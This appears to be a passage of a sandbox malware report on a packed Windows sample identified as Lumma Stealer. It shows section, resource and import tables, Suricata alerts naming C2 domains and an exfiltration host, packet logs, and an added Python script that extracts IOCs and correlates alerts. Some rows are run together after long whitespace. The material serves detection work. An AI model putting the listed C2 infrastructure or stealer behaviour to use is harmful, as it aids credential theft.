IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x326000 | 0xe4 | .vmp
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3f65a | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x41000 | 0x255d | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x44000 | 0xf070 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.vmp | 0x54000 | 0x2d10ce | 0x0 | d41d8cd98f00b204e9800998ecf8427e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.vmp | 0x326000 | 0x26c | 0x400 | 68931710b06e7b45b49528f8f1aa8078 | False | 0.2177734375 | data | 1.5033045918844197 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.vmp | 0x327000 | 0x5d0e10 | 0x5d1000 | 9961061084943ecbb8483bb1615607bb | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc | 0x8f8000 | 0x6a8 | 0x800 | 25877f7c938b200def1cc9b28f151b61 | False | 0.42138671875 | data | 3.695613417085349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x8f9000 | 0x64fbb | 0x2d800 | fbce41ded10dc7f3bf2933bbad27666a | False | 0.6787592290521978 | data | 6.583707610599787 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
TIS | 0x926708 | 0x3f88 | data | English | United States | 0.04838709677419355
TIS | 0x92a690 | 0xd62 | empty | English | United States | 0
TIS | 0x92b3f4 | 0x3c44 | empty | English | United States | 0
TIS | 0x92f038 | 0x888 | empty | English | United States | 0
RT_CURSOR | 0x92f8c0 | 0x134 | empty | English | United States | 0
RT_CURSOR | 0x92f9f4 | 0x134 | empty | English | United States | 0
RT_CURSOR | 0x92fb28 | 0x134 | empty | English | United States | 0
RT_CURSOR | 0x92fc5c | 0x134 | empty | English | United States | 0
RT_CURSOR | 0x92fd90 | 0x134 | empty | English | United States | 0
RT_BITMAP | 0x92fec4 | 0x6568 | empty | English | United States | 0
RT_BITMAP | 0x93642c | 0x1148 | empty | English | United States | 0
RT_BITMAP | 0x937574 | 0x2f6a | empty | English | United States | 0
RT_BITMAP | 0x93a4e0 | 0x84a | empty | English | United States | 0
RT_BITMAP | 0x93ad2c | 0x1645e | empty | English | United States | 0
RT_BITMAP | 0x95118c | 0x1b2a | empty | English | United States | 0
RT_BITMAP | 0x952cb8 | 0xbea | empty | English | United States | 0
RT_ICON | 0x8fa8c0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | English | United States | 0.7368667917448405
RT_ICON | 0x8fb968 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | United States | 0.5006802318703419
RT_ICON | 0x90c190 | 0x11b63 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 1.0003721725226404
RT_ICON | 0x91dcf4 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | United States | 0.605595667870036
RT_ICON | 0x91e59c | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | United States | 0.42057761732851984
RT_ICON | 0x91ee44 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | United States | 0.4864864864864865
RT_ICON | 0x91ef6c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | United States | 0.661849710982659
RT_ICON | 0x91f4d4 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.4849290780141844
RT_ICON | 0x91f93c | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | United States | 0.26344086021505375
RT_ICON | 0x91fc24 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | United States | 0.4966216216216216
RT_ICON | 0x91fd4c | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | United States | 0.47247292418772563
RT_ICON | 0x9205f4 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | United States | 0.6365606936416185
RT_ICON | 0x920b5c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.2945590994371482
RT_ICON | 0x921c04 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.4592198581560284
RT_ICON | 0x92206c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States | 0.5168918918918919
RT_ICON | 0x922194 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | English | United States | 0.596820809248555
RT_ICON | 0x9226fc | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.7039007092198581
RT_ICON | 0x922b64 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | United States | 0.527027027027027
RT_ICON | 0x922c8c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States | 0.5844594594594594
RT_ICON | 0x922db4 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | English | United States | 0.4667630057803468
RT_ICON | 0x92331c | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.3911290322580645
RT_ICON | 0x923604 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | English | United States | 0.5257220216606499
RT_ICON | 0x923eac | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6205673758865248
RT_ICON | 0x924314 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.37171669793621015
RT_MENU | 0x9538a4 | 0x480 | empty | English | United States | 0
RT_MENU | 0x953d24 | 0x72 | empty | Russian | Russia | 0
RT_MENU | 0x953d98 | 0x7c | empty | English | United States | 0
RT_MENU | 0x953e14 | 0x70e | empty | English | United States | 0
RT_MENU | 0x954524 | 0x73a | empty | English | United States | 0
RT_MENU | 0x954c60 | 0x2a4 | empty | English | United States | 0
                                                                                                                                                                                                                                        RT_MENU0x954f040x58emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x954f5c0x10eemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x95506c0x3aaemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9554180xa4emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9554bc0x1f2emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9556b00x1b2emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9558640x21aemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x955a800xd8emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x955b580x160emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x955cb80x1eeemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x955ea80x312emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9561bc0x374emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9565300x136emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9566680x33eemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9569a80x144emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x956aec0x2a2emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x956d900xc8emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x956e580x26eemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9570c80x3aeemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9574780x2baemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9577340x3feemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x957b340x316emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x957e4c0x100emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x957f4c0xf6emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9580440x2b8emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9582fc0xa2emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9583a00xa2emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9584440x26aemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9586b00x41cemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x958acc0x120emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x958bec0x288emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x958e740x12eemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x958fa40x11eemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9590c40x17eemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9592440x366emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9595ac0x124emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9596d00x1feemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_DIALOG0x9598d00x12eemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x959a000x8aemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x959a8c0x130emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x959bbc0x2eemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x959bec0x1d2emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x959dc00x97eemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95a7400x29cemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95a9dc0x332emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95ad100x38cemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95b09c0x262emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95b3000x2acemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95b5ac0x25cemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95b8080x688emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95be900x36eemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95c2000x190emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95c3900x25eemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95c5f00x5e8emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95cbd80x558emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95d1300x46aemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95d59c0x26cemptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95d8080x348emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_STRING0x95db500x292emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x95dde40x14emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x95ddf80x14emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x95de0c0x14emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x95de200x14emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x95de340x14emptyEnglishUnited States0
                                                                                                                                                                                                                                        RT_GROUP_ICON0x9253bc0x30dataEnglishUnited States0.8541666666666666
                                                                                                                                                                                                                                        RT_GROUP_ICON0x9253ec0x14dataEnglishUnited States1.25
                                                                                                                                                                                                                                        RT_GROUP_ICON0x9254000x14dataEnglishUnited States1.25
                                                                                                                                                                                                                                        RT_GROUP_ICON0x9254140x30dataEnglishUnited States0.9375
                                                                                                                                                                                                                                        RT_GROUP_ICON0x9254440x5adataEnglishUnited States0.7444444444444445
                                                                                                                                                                                                                                        RT_GROUP_ICON0x9254a00x30dataEnglishUnited States0.9375
                                                                                                                                                                                                                                        RT_GROUP_ICON0x9254d00x14dataEnglishUnited States1.25
                                                                                                                                                                                                                                        RT_GROUP_ICON0x9254e40x5adataEnglishUnited States0.7555555555555555
                                                                                                                                                                                                                                        RT_VERSION0x9255400x38cPGP symmetric key encrypted data - Plaintext or unencrypted dataEnglishUnited States0.33259911894273125
                                                                                                                                                                                                                                        RT_MANIFEST0x9258cc0xe3bXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.38594564919022784
                                                                                                                                                                                                                                        None0x95de480xc5empty0
                                                                                                                                                                                                                                        None0x95df100xabempty0
DLL | Import
KERNEL32.dll | CopyFileW, ExitProcess, GetCommandLineW, GetCurrentProcessId, GetCurrentThreadId, GetLogicalDrives, GetSystemDirectoryW, GlobalLock, GlobalUnlock
USER32.dll | CloseClipboard, FindWindowExW, GetClipboardData, GetDC, GetForegroundWindow, GetSystemMetrics, GetWindowLongW, GetWindowThreadProcessId, IsWindowEnabled, IsWindowVisible, OpenClipboard, ReleaseDC
GDI32.dll | BitBlt, CreateCompatibleBitmap, CreateCompatibleDC, CreateDIBSection, DeleteDC, DeleteObject, GetCurrentObject, GetDIBits, GetObjectW, GetPixel, SelectObject, StretchBlt
ole32.dll | CoCreateInstance, CoInitializeEx, CoInitializeSecurity, CoSetProxyBlanket, CoUninitialize
SHELL32.dll | SHEmptyRecycleBinW, SHGetFileInfoW
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear, VariantInit
KERNEL32.dll | HeapAlloc, HeapFree, ExitProcess, GetModuleHandleA, LoadLibraryA, GetProcAddress
Language of compilation system | Country where language is spoken | Map
English | United States |
Russian | Russia |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-18T15:17:35.709139+0100 | 2057352 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (terracedjz .cyou) | 1 | 192.168.2.6 | 63769 | 1.1.1.1 | 53 | UDP
2024-12-18T15:17:36.052127+0100 | 2057269 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (worddosofrm .shop) | 1 | 192.168.2.6 | 55056 | 1.1.1.1 | 53 | UDP
2024-12-18T15:17:36.192611+0100 | 2057267 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mutterissuen .shop) | 1 | 192.168.2.6 | 57083 | 1.1.1.1 | 53 | UDP
2024-12-18T15:17:36.424197+0100 | 2057265 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (standartedby .shop) | 1 | 192.168.2.6 | 57898 | 1.1.1.1 | 53 | UDP
2024-12-18T15:17:36.738535+0100 | 2057263 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nightybinybz .shop) | 1 | 192.168.2.6 | 57779 | 1.1.1.1 | 53 | UDP
2024-12-18T15:17:36.962636+0100 | 2057259 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (conceszustyb .shop) | 1 | 192.168.2.6 | 62264 | 1.1.1.1 | 53 | UDP
2024-12-18T15:17:37.383090+0100 | 2057261 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bakedstusteeb .shop) | 1 | 192.168.2.6 | 55807 | 1.1.1.1 | 53 | UDP
2024-12-18T15:17:37.613350+0100 | 2057257 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (respectabosiz .shop) | 1 | 192.168.2.6 | 61328 | 1.1.1.1 | 53 | UDP
2024-12-18T15:17:37.754474+0100 | 2057255 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (moutheventushz .shop) | 1 | 192.168.2.6 | 64818 | 1.1.1.1 | 53 | UDP
2024-12-18T15:17:39.784288+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49715 | 23.55.153.106 | 443 | TCP
2024-12-18T15:17:41.246844+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.6 | 49715 | 23.55.153.106 | 443 | TCP
2024-12-18T15:17:43.119365+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49724 | 104.21.66.86 | 443 | TCP
2024-12-18T15:17:45.454383+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49724 | 104.21.66.86 | 443 | TCP
2024-12-18T15:17:45.454383+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49724 | 104.21.66.86 | 443 | TCP
2024-12-18T15:17:46.797919+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49739 | 104.21.66.86 | 443 | TCP
2024-12-18T15:17:47.991015+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.6 | 49739 | 104.21.66.86 | 443 | TCP
2024-12-18T15:17:47.991015+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49739 | 104.21.66.86 | 443 | TCP
2024-12-18T15:17:49.546406+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49747 | 104.21.66.86 | 443 | TCP
2024-12-18T15:17:54.184493+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.6 | 49747 | 104.21.66.86 | 443 | TCP
                                                                                                                                                                                                                                        2024-12-18T15:17:55.562519+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649761104.21.66.86443TCP
                                                                                                                                                                                                                                        2024-12-18T15:18:00.002374+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649771104.21.66.86443TCP
                                                                                                                                                                                                                                        2024-12-18T15:18:04.470967+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649782104.21.66.86443TCP
                                                                                                                                                                                                                                        2024-12-18T15:18:07.954372+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649790104.21.66.86443TCP
                                                                                                                                                                                                                                        2024-12-18T15:18:15.647919+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649817104.21.66.86443TCP
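The alert table above is most useful when each alert is tied back to the connection it fired on: the JA3 fingerprint hit is only severity 3 on its own, but on three of these flows it is followed within seconds by a severity-1 Lumma check-in or exfiltration alert on the same source port, and the two DNS alerts carry the C2 domains in defanged form. The script below is an added example, not part of the Joe Sandbox report or of any Suricata tooling: it parses the alert rows (transcribed from the table above into pipe-delimited text as constructed input), groups them by 5-tuple, refangs the domains out of the ET rule messages and lists the flows where a JA3 hit escalated. Treating the "Steam Profile Lookup" destination separately from the C2 hosts is this example's own choice, based only on the signature name.

```python
"""Correlate a sandbox run's Suricata alerts with the flows they fired on.
Added example, not Joe Sandbox code; rows below are transcribed from the alert
table above into pipe-delimited text (constructed input for this script)."""
import re
from collections import defaultdict
from datetime import datetime

ALERTS = """\
2024-12-18T15:17:37.613350+0100|2057257|ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (respectabosiz .shop)|1|192.168.2.6|61328|1.1.1.1|53|UDP
2024-12-18T15:17:37.754474+0100|2057255|ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (moutheventushz .shop)|1|192.168.2.6|64818|1.1.1.1|53|UDP
2024-12-18T15:17:39.784288+0100|2028371|ET JA3 Hash - Possible Malware - Fake Firefox Font Update|3|192.168.2.6|49715|23.55.153.106|443|TCP
2024-12-18T15:17:41.246844+0100|2858666|ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup|1|192.168.2.6|49715|23.55.153.106|443|TCP
2024-12-18T15:17:43.119365+0100|2028371|ET JA3 Hash - Possible Malware - Fake Firefox Font Update|3|192.168.2.6|49724|104.21.66.86|443|TCP
2024-12-18T15:17:45.454383+0100|2049836|ET MALWARE Lumma Stealer Related Activity|1|192.168.2.6|49724|104.21.66.86|443|TCP
2024-12-18T15:17:45.454383+0100|2054653|ET MALWARE Lumma Stealer CnC Host Checkin|1|192.168.2.6|49724|104.21.66.86|443|TCP
2024-12-18T15:17:46.797919+0100|2028371|ET JA3 Hash - Possible Malware - Fake Firefox Font Update|3|192.168.2.6|49739|104.21.66.86|443|TCP
2024-12-18T15:17:47.991015+0100|2049812|ET MALWARE Lumma Stealer Related Activity M2|1|192.168.2.6|49739|104.21.66.86|443|TCP
2024-12-18T15:17:47.991015+0100|2054653|ET MALWARE Lumma Stealer CnC Host Checkin|1|192.168.2.6|49739|104.21.66.86|443|TCP
2024-12-18T15:17:49.546406+0100|2028371|ET JA3 Hash - Possible Malware - Fake Firefox Font Update|3|192.168.2.6|49747|104.21.66.86|443|TCP
2024-12-18T15:17:54.184493+0100|2048094|ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration|1|192.168.2.6|49747|104.21.66.86|443|TCP
2024-12-18T15:17:55.562519+0100|2028371|ET JA3 Hash - Possible Malware - Fake Firefox Font Update|3|192.168.2.6|49761|104.21.66.86|443|TCP
2024-12-18T15:18:00.002374+0100|2028371|ET JA3 Hash - Possible Malware - Fake Firefox Font Update|3|192.168.2.6|49771|104.21.66.86|443|TCP
2024-12-18T15:18:04.470967+0100|2028371|ET JA3 Hash - Possible Malware - Fake Firefox Font Update|3|192.168.2.6|49782|104.21.66.86|443|TCP
2024-12-18T15:18:07.954372+0100|2028371|ET JA3 Hash - Possible Malware - Fake Firefox Font Update|3|192.168.2.6|49790|104.21.66.86|443|TCP
2024-12-18T15:18:15.647919+0100|2028371|ET JA3 Hash - Possible Malware - Fake Firefox Font Update|3|192.168.2.6|49817|104.21.66.86|443|TCP
"""

FIELDS = ("timestamp", "sid", "signature", "severity",
          "src_ip", "src_port", "dst_ip", "dst_port", "proto")

def parse_alerts(text):
    """Turn pipe-delimited rows into dicts; SID, severity and ports become ints."""
    alerts = []
    for line in filter(str.strip, text.splitlines()):
        parts = [p.strip() for p in line.split("|")]
        if len(parts) != len(FIELDS):
            raise ValueError(f"malformed alert row: {line!r}")
        a = dict(zip(FIELDS, parts))
        a["time"] = datetime.strptime(a["timestamp"], "%Y-%m-%dT%H:%M:%S.%f%z")
        for k in ("sid", "severity", "src_port", "dst_port"):
            a[k] = int(a[k])
        alerts.append(a)
    return alerts

def flow_key(a):
    """5-tuple identifying the connection an alert fired on."""
    return (a["proto"], a["src_ip"], a["src_port"], a["dst_ip"], a["dst_port"])

def group_by_flow(alerts):
    """Map each flow to its alerts in time order (stable sort keeps ties in report order)."""
    flows = defaultdict(list)
    for a in sorted(alerts, key=lambda a: a["time"]):
        flows[flow_key(a)].append(a)
    return dict(flows)

# ET rule messages defang the domain as "(name .tld)"; undo that to get an IOC.
DEFANGED_DOMAIN = re.compile(r"\(([A-Za-z0-9-]+(?:\s*\.\s*[A-Za-z0-9-]+)+)\)")

def refang_domain(signature):
    m = DEFANGED_DOMAIN.search(signature)
    return re.sub(r"\s+", "", m.group(1)) if m else None

def extract_iocs(alerts):
    """C2 domains from the DNS alerts, plus hosts hit by severity-1 TCP alerts.
    The Steam profile lookup target is kept apart: that signature marks a lookup
    of a third-party service, not the C2 host, so it is not a block-list entry."""
    domains, c2_hosts, lookup_hosts = [], [], []
    for a in alerts:
        if a["proto"] == "UDP" and a["dst_port"] == 53:
            d = refang_domain(a["signature"])
            if d and d not in domains:
                domains.append(d)
        elif a["proto"] == "TCP" and a["severity"] == 1:
            bucket = lookup_hosts if "Steam Profile Lookup" in a["signature"] else c2_hosts
            host = f"{a['dst_ip']}:{a['dst_port']}"
            if host not in bucket:
                bucket.append(host)
    return {"domains": domains, "c2_hosts": c2_hosts, "lookup_hosts": lookup_hosts}

def escalations(flows):
    """Flows where a low-severity JA3 fingerprint hit is followed on the same
    connection by a severity-1 alert: (flow, seconds between them, signature)."""
    out = []
    for key, items in flows.items():
        ja3 = next((a for a in items if "JA3" in a["signature"]), None)
        hit = next((a for a in items if a["severity"] == 1), None)
        if ja3 and hit and hit["time"] >= ja3["time"]:
            out.append((key, (hit["time"] - ja3["time"]).total_seconds(), hit["signature"]))
    return out

if __name__ == "__main__":
    alerts = parse_alerts(ALERTS)
    print(extract_iocs(alerts))
    for (proto, src, sport, dst, dport), secs, sig in escalations(group_by_flow(alerts)):
        print(f"{src}:{sport} -> {dst}:{dport} {proto}: JA3 hit, then '{sig}' {secs:.3f}s later")
```

On this report's rows the script yields the two refanged domains, 104.21.66.86:443 as the only host behind the check-in and exfiltration alerts, 23.55.153.106:443 as the Steam lookup target, and four flows (source ports 49715, 49724, 49739, 49747) where the JA3 hit escalated to a severity-1 alert between about 1.2 and 4.6 seconds later. The five later flows to 104.21.66.86 carry only the JA3 alert, which is the point of the correlation: a JA3 match alone is a weak signal, while a JA3 match followed by a check-in on the same connection is not.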
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 15:17:38.135550976 CET | 49715 | 443 | 192.168.2.6 | 23.55.153.106
Dec 18, 2024 15:17:38.135602951 CET | 443 | 49715 | 23.55.153.106 | 192.168.2.6
Dec 18, 2024 15:17:38.135670900 CET | 49715 | 443 | 192.168.2.6 | 23.55.153.106
Dec 18, 2024 15:17:38.387649059 CET | 49715 | 443 | 192.168.2.6 | 23.55.153.106
Dec 18, 2024 15:17:38.387691021 CET | 443 | 49715 | 23.55.153.106 | 192.168.2.6
Dec 18, 2024 15:17:39.784202099 CET | 443 | 49715 | 23.55.153.106 | 192.168.2.6
Dec 18, 2024 15:17:39.784287930 CET | 49715 | 443 | 192.168.2.6 | 23.55.153.106
Dec 18, 2024 15:17:39.787102938 CET | 49715 | 443 | 192.168.2.6 | 23.55.153.106
Dec 18, 2024 15:17:39.787127972 CET | 443 | 49715 | 23.55.153.106 | 192.168.2.6
Dec 18, 2024 15:17:39.787436962 CET | 443 | 49715 | 23.55.153.106 | 192.168.2.6
Dec 18, 2024 15:17:39.835177898 CET | 49715 | 443 | 192.168.2.6 | 23.55.153.106
Dec 18, 2024 15:17:40.572591066 CET | 49715 | 443 | 192.168.2.6 | 23.55.153.106
Dec 18, 2024 15:17:40.615375042 CET | 443 | 49715 | 23.55.153.106 | 192.168.2.6
Dec 18, 2024 15:17:41.246870041 CET | 443 | 49715 | 23.55.153.106 | 192.168.2.6
Dec 18, 2024 15:17:41.246897936 CET | 443 | 49715 | 23.55.153.106 | 192.168.2.6
Dec 18, 2024 15:17:41.246948957 CET | 49715 | 443 | 192.168.2.6 | 23.55.153.106
Dec 18, 2024 15:17:41.246972084 CET | 443 | 49715 | 23.55.153.106 | 192.168.2.6
Dec 18, 2024 15:17:41.247020960 CET | 443 | 49715 | 23.55.153.106 | 192.168.2.6
Dec 18, 2024 15:17:41.247067928 CET | 443 | 49715 | 23.55.153.106 | 192.168.2.6
Dec 18, 2024 15:17:41.247083902 CET | 443 | 49715 | 23.55.153.106 | 192.168.2.6
Dec 18, 2024 15:17:41.247095108 CET | 49715 | 443 | 192.168.2.6 | 23.55.153.106
Dec 18, 2024 15:17:41.247095108 CET | 49715 | 443 | 192.168.2.6 | 23.55.153.106
Dec 18, 2024 15:17:41.247095108 CET | 49715 | 443 | 192.168.2.6 | 23.55.153.106
Dec 18, 2024 15:17:41.247112989 CET | 49715 | 443 | 192.168.2.6 | 23.55.153.106
Dec 18, 2024 15:17:41.247129917 CET | 49715 | 443 | 192.168.2.6 | 23.55.153.106
Dec 18, 2024 15:17:41.415951967 CET | 443 | 49715 | 23.55.153.106 | 192.168.2.6
Dec 18, 2024 15:17:41.416030884 CET | 443 | 49715 | 23.55.153.106 | 192.168.2.6
Dec 18, 2024 15:17:41.416064978 CET | 49715 | 443 | 192.168.2.6 | 23.55.153.106
Dec 18, 2024 15:17:41.416141033 CET | 443 | 49715 | 23.55.153.106 | 192.168.2.6
Dec 18, 2024 15:17:41.416198969 CET | 49715 | 443 | 192.168.2.6 | 23.55.153.106
